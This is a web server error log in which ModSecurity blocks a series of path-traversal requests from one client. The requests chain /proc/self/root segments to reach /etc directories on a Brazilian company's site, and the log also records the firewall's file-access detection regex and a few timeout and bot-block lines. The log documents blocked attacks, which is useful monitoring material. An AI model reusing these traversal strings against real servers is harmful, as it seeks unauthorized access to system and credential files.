[Thu Mar 19 06:59:34.574792 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.243.128:58582] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJBvu8EFLIOrSqIpuDCgAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:59:39.858674 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:52828] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJCwkwaGbbGflqUZCb8QAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:59:46.555336 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.243.128:52828] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJEgkwaGbbGflqUZCb9wAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:59:54.117829 2026] [proxy_fcgi:error] [pid 30077:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:48542] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:59:54.149987 2026] [:error] [pid 19093:tid 140411649607424] [client 74.7.243.128:44432] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJGl_V7PWP6ixUYl6dtQAAAos"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 07:00:01.982304 2026] [:error] [pid 19093:tid 140411548894976] [client 74.7.243.128:37096] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJIV_V7PWP6ixUYl6duAAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 07:00:15.474286 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.243.128:55410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJL-yqAr6etmhZHNpFDQAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 07:00:21.120591 2026] [proxy_fcgi:error] [pid 31803:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:49124] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:00:36.418751 2026] [:error] [pid 27403:tid 140411641214720] [client 74.7.243.128:51144] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJRBkFeYa1D6dYQnDRbgAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 07:00:48.168894 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:48010] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJUNa6ubjKNq_cu4YqVQAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 07:00:52.643469 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:39260] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJVNa6ubjKNq_cu4YqXAAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 07:00:54.184419 2026] [proxy_fcgi:error] [pid 14269:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:49930] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:00:54.536543 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:39260] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJVda6ubjKNq_cu4YqXgAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 07:00:57.867180 2026] [:error] [pid 27403:tid 140411624429312] [client 74.7.243.128:39272] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJWRkFeYa1D6dYQnDRegAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 07:01:00.977432 2026] [:error] [pid 19093:tid 140411632822016] [client 74.7.243.128:36104] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJXF_V7PWP6ixUYl6d1gAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 07:01:04.982325 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:36106] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJYOyqAr6etmhZHNpFJAAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 07:01:11.681352 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:46122] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJZ-oXxyEfFpUF8f_xewAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 07:01:17.049846 2026] [proxy_fcgi:error] [pid 17887:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:50588] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:01:22.122889 2026] [:error] [pid 19093:tid 140411565680384] [client 74.7.228.61:49468] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvJcl_V7PWP6ixUYl6d4gAAApU"]
[Thu Mar 19 07:01:23.850076 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:46130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJc9a6ubjKNq_cu4YqdAAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 07:01:29.967882 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:41394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJeeyqAr6etmhZHNpFNgAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 07:01:41.453827 2026] [proxy_fcgi:error] [pid 17653:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:51186] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:01:42.225307 2026] [:error] [pid 27403:tid 140411540502272] [client 74.7.243.128:56720] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJhBkFeYa1D6dYQnDRrAAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 07:01:48.788021 2026] [:error] [pid 14269:tid 140411666392832] [client 74.7.243.128:56734] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJiwbLMZ6AikZjR9U-2gAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 07:01:57.664930 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:43836] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJleyqAr6etmhZHNpFTQAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 07:02:03.125827 2026] [proxy_fcgi:error] [pid 31803:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:51732] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:02:04.479518 2026] [:error] [pid 27403:tid 140411574073088] [client 74.7.243.128:59070] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJnBkFeYa1D6dYQnDRvAAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
